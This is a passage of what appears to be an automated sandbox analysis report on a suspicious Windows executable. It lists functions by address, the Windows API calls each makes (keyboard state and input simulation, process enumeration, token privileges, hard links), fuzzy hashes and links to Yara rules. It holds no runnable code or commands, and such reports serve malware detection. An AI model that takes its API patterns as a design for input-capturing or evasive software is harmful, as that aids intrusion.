                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 88bad2386153d0814011ce45ead2e348d4da163676a3267e3734cee36ff20830
                                      • Instruction ID: 83114d474289ae884b0065c34f9507d5ee995bc74d03b247c350021451878f40
                                      • Opcode Fuzzy Hash: 88bad2386153d0814011ce45ead2e348d4da163676a3267e3734cee36ff20830
                                      • Instruction Fuzzy Hash: B3410379A00304BFD7289F79CC42FAABBA9EB84714F10452FF401DB291D379990187D8
                                      Function 005056D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00505783
                                      • GetLastError.KERNEL32(?,00000000), ref: 005057A9
                                      • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 005057CE
                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 005057FA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                      • String ID:
                                      • API String ID: 3321077145-0
                                      • Opcode ID: cf0e628381652e70ee2131a50eb3e41b572cc4520b2427c3e9d7af58b1451d5e
                                      • Instruction ID: 5f7e8a3d24ac2c89519302a9cff6b4b298d491e27df72efc914215a9abd2a3dd
                                      • Opcode Fuzzy Hash: cf0e628381652e70ee2131a50eb3e41b572cc4520b2427c3e9d7af58b1451d5e
                                      • Instruction Fuzzy Hash: B5412B39204610DFCB10DF16C544A1EBFE1EF89368B198499E84A5B3A2DB34FD01DB95
                                      Function 004CD8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,004B6D71,00000000,00000000,004B82D9,?,004B82D9,?,00000001,004B6D71,?,00000001,004B82D9,004B82D9), ref: 004CD910
                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 004CD999
                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 004CD9AB
                                      • __freea.LIBCMT ref: 004CD9B4
                                        • Part of subcall function 004C3820: RtlAllocateHeap.NTDLL(00000000,?,00561444,?,004AFDF5,?,?,0049A976,00000010,00561440,004913FC,?,004913C6,?,00491129), ref: 004C3852
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                      • String ID:
                                      • API String ID: 2652629310-0
                                      • Opcode ID: f253ed4516c8ba7fb76bf1592d311a2b83dc2e435ca6cdefa73e5416e59e74d2
                                      • Instruction ID: 255072c543fe2490a80d7541ab1b9dd95ee0a8b2a1c75ff9fe7184c2d4b52d3b
                                      • Opcode Fuzzy Hash: f253ed4516c8ba7fb76bf1592d311a2b83dc2e435ca6cdefa73e5416e59e74d2
                                      • Instruction Fuzzy Hash: 2E31CEB6A0020AABDB24DF65DC41EAF7BA5EF41310F05426EFC04D6291EB39CD55CBA4
                                      Function 005252C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 00525352
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00525375
                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00525382
                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 005253A8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: LongWindow$InvalidateMessageRectSend
                                      • String ID:
                                      • API String ID: 3340791633-0
                                      • Opcode ID: d9ff54565c27cc96356f83f192b1e6c8013fec422919279fe9d6cecfe01c27ac
                                      • Instruction ID: fc251804b8426604eb63eb02d467dffaa5cbf121c0393c66fd94d952eaa8204f
                                      • Opcode Fuzzy Hash: d9ff54565c27cc96356f83f192b1e6c8013fec422919279fe9d6cecfe01c27ac
                                      • Instruction Fuzzy Hash: F131E930A55A28EFEB30DF14EC45BE83F65BF27390F586801F611961E1E7B4AD40AB41
                                      Function 004FAB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 004FABF1
                                      • SetKeyboardState.USER32(00000080,?,00008000), ref: 004FAC0D
                                      • PostMessageW.USER32(00000000,00000101,00000000), ref: 004FAC74
                                      • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 004FACC6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: KeyboardState$InputMessagePostSend
                                      • String ID:
                                      • API String ID: 432972143-0
                                      • Opcode ID: 459766a97a0112ab1d8422ba5aa0015cc4174007f9e0cd12bb163f7b0ff2ca45
                                      • Instruction ID: 55ada5984e2a7b2a184215e8767d45ca62218dd8de3e35e239c2dc7860534bec
                                      • Opcode Fuzzy Hash: 459766a97a0112ab1d8422ba5aa0015cc4174007f9e0cd12bb163f7b0ff2ca45
                                      • Instruction Fuzzy Hash: A93118B0A0069C6FEB34CB658C087FF7AA5AF49310F04421BE689562D1C37D89A5975B
                                      Function 00527674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • ClientToScreen.USER32(?,?), ref: 0052769A
                                      • GetWindowRect.USER32(?,?), ref: 00527710
                                      • PtInRect.USER32(?,?,00528B89), ref: 00527720
                                      • MessageBeep.USER32(00000000), ref: 0052778C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Rect$BeepClientMessageScreenWindow
                                      • String ID:
                                      • API String ID: 1352109105-0
                                      • Opcode ID: dd80a8f5a88c8cbcc9b9e02612649cffdcd96ac49850cf7529dcdbf68aa3519a
                                      • Instruction ID: bf043e00b9e46afa798ae38ec24f9b2d33b39ebde4dc124ed3c35160b90a0d1a
                                      • Opcode Fuzzy Hash: dd80a8f5a88c8cbcc9b9e02612649cffdcd96ac49850cf7529dcdbf68aa3519a
                                      • Instruction Fuzzy Hash: 96418B346052299FCB11CF58E894EA97BF4FF5E304F1840A8E8149B2A1C370A946DF90
                                      Function 005216DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetForegroundWindow.USER32 ref: 005216EB
                                        • Part of subcall function 004F3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 004F3A57
                                        • Part of subcall function 004F3A3D: GetCurrentThreadId.KERNEL32 ref: 004F3A5E
                                        • Part of subcall function 004F3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,004F25B3), ref: 004F3A65
                                      • GetCaretPos.USER32(?), ref: 005216FF
                                      • ClientToScreen.USER32(00000000,?), ref: 0052174C
                                      • GetForegroundWindow.USER32 ref: 00521752
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                      • String ID:
                                      • API String ID: 2759813231-0
                                      • Opcode ID: 20aeb33db2f51ece3f581dc583113a1ba7bba637bb9881a2f7858586b09aa4d9
                                      • Instruction ID: de62d3331a6c9714d91106ce5b78ea249b7bd34afdd533feaff82fdb605bdff6
                                      • Opcode Fuzzy Hash: 20aeb33db2f51ece3f581dc583113a1ba7bba637bb9881a2f7858586b09aa4d9
                                      • Instruction Fuzzy Hash: E4313271D00149AFCB10DFA6C881CAEBBF9EF99308B54406EE415E7251E7359E45CBA4
                                      Function 004FD4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 004FD501
                                      • Process32FirstW.KERNEL32(00000000,?), ref: 004FD50F
                                      • Process32NextW.KERNEL32(00000000,?), ref: 004FD52F
                                      • CloseHandle.KERNEL32(00000000), ref: 004FD5DC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                      • String ID:
                                      • API String ID: 420147892-0
                                      • Opcode ID: 722eb1d5e6a2173e459773720398cbca585f1624266db087011f6bce88877cbb
                                      • Instruction ID: bdc1982f26dd168381ac3d8291150e4707b48db8bf81c2a125dc085035d878f2
                                      • Opcode Fuzzy Hash: 722eb1d5e6a2173e459773720398cbca585f1624266db087011f6bce88877cbb
                                      • Instruction Fuzzy Hash: A531C471008304AFD710EF55C881ABFBFF8EF99358F14092EF581821A2EB759949CB96
                                      Function 00528FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004A9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 004A9BB2
                                      • GetCursorPos.USER32(?), ref: 00529001
                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,004E7711,?,?,?,?,?), ref: 00529016
                                      • GetCursorPos.USER32(?), ref: 0052905E
                                      • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,004E7711,?,?,?), ref: 00529094
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                                      • String ID:
                                      • API String ID: 2864067406-0
                                      • Opcode ID: e9cbebbe2f369c681cd235faedb39a754f074533321576c9cfaf196fb7bc9b73
                                      • Instruction ID: 29655e335a246f52c7ee5e5d13171c04cbece073f23873bb4f5855fff507c562
                                      • Opcode Fuzzy Hash: e9cbebbe2f369c681cd235faedb39a754f074533321576c9cfaf196fb7bc9b73
                                      • Instruction Fuzzy Hash: 17219F35600028EFDB258F98D898EFA7FB9FF8A350F044159F9058B2A1C375AD51EB60
                                      Function 004FD2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetFileAttributesW.KERNEL32(?,0052CB68), ref: 004FD2FB
                                      • GetLastError.KERNEL32 ref: 004FD30A
                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 004FD319
                                      • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0052CB68), ref: 004FD376
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: CreateDirectory$AttributesErrorFileLast
                                      • String ID:
                                      • API String ID: 2267087916-0
                                      • Opcode ID: da085ba32dc94130ed65e1bf9975aabf419e73bb4911c315f482dcf8e047e056
                                      • Instruction ID: 19807928ea5281e7947173caa967fdfeb4b34fc0b7920d23b0af3b94b33ee20b
                                      • Opcode Fuzzy Hash: da085ba32dc94130ed65e1bf9975aabf419e73bb4911c315f482dcf8e047e056
                                      • Instruction Fuzzy Hash: EA21D6749042059F8710DF29C88187F7BE5EE56368F104A2EFA99C32A1DB34DD0ACB97
                                      Function 004F1571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004F1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 004F102A
                                        • Part of subcall function 004F1014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 004F1036
                                        • Part of subcall function 004F1014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 004F1045
                                        • Part of subcall function 004F1014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 004F104C
                                        • Part of subcall function 004F1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 004F1062
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 004F15BE
                                      • _memcmp.LIBVCRUNTIME ref: 004F15E1
                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004F1617
                                      • HeapFree.KERNEL32(00000000), ref: 004F161E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                      • String ID:
                                      • API String ID: 1592001646-0
                                      • Opcode ID: 4b2baedcd929c6300c7d5639dd28283f63a211abbdb0f71d874d07ff2faf5855
                                      • Instruction ID: 408cf12e158c1006dda0960f56aa073b3e769d4876efad812747e0d82197b322
                                      • Opcode Fuzzy Hash: 4b2baedcd929c6300c7d5639dd28283f63a211abbdb0f71d874d07ff2faf5855
                                      • Instruction Fuzzy Hash: 23217A31E00108EFEF14DFA4C945BFEB7B8EF55344F08445AE541AB261E739AA09DBA4
                                      Function 00522782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetWindowLongW.USER32(?,000000EC), ref: 0052280A
                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00522824
                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00522832
                                      • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00522840
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Window$Long$AttributesLayered
                                      • String ID:
                                      • API String ID: 2169480361-0
                                      • Opcode ID: d696d4bd87af6ba4c11d3e89338b8763c57fe2e1b0bd9b722242ed299a6664bd
                                      • Instruction ID: 56ed0a255abb96597bbc5039af37affb3358bb8e43439c924e17aff7b1a8dac8
                                      • Opcode Fuzzy Hash: d696d4bd87af6ba4c11d3e89338b8763c57fe2e1b0bd9b722242ed299a6664bd
                                      • Instruction Fuzzy Hash: 4221B235208121BFD7149B24D844F6A7F95FF86324F148158F4168B6E2C775FC42CB90
                                      Function 004F78F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004F8D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,004F790A,?,000000FF,?,004F8754,00000000,?,0000001C,?,?), ref: 004F8D8C
                                        • Part of subcall function 004F8D7D: lstrcpyW.KERNEL32(00000000,?), ref: 004F8DB2
                                        • Part of subcall function 004F8D7D: lstrcmpiW.KERNEL32(00000000,?,004F790A,?,000000FF,?,004F8754,00000000,?,0000001C,?,?), ref: 004F8DE3
                                      • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,004F8754,00000000,?,0000001C,?,?,00000000), ref: 004F7923
                                      • lstrcpyW.KERNEL32(00000000,?), ref: 004F7949
                                      • lstrcmpiW.KERNEL32(00000002,cdecl,?,004F8754,00000000,?,0000001C,?,?,00000000), ref: 004F7984
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: lstrcmpilstrcpylstrlen
                                      • String ID: cdecl
                                      • API String ID: 4031866154-3896280584
                                      • Opcode ID: a141e3bed532bed627b6999bbf090577b4eadb58313efd6de0f05de5332452d1
                                      • Instruction ID: 6e53e8a5ce442cfb5b149805f037414dbb9af3855b2f88208e7c50ceb3f97da4
                                      • Opcode Fuzzy Hash: a141e3bed532bed627b6999bbf090577b4eadb58313efd6de0f05de5332452d1
                                      • Instruction Fuzzy Hash: 0F11367A200205ABEB209F35CC45D7B77A5FF95350B00402FFA02CB3A4EB798811C795
                                      Function 00525660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,00001060,?,00000004), ref: 005256BB
                                      • _wcslen.LIBCMT ref: 005256CD
                                      • _wcslen.LIBCMT ref: 005256D8
                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00525816
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
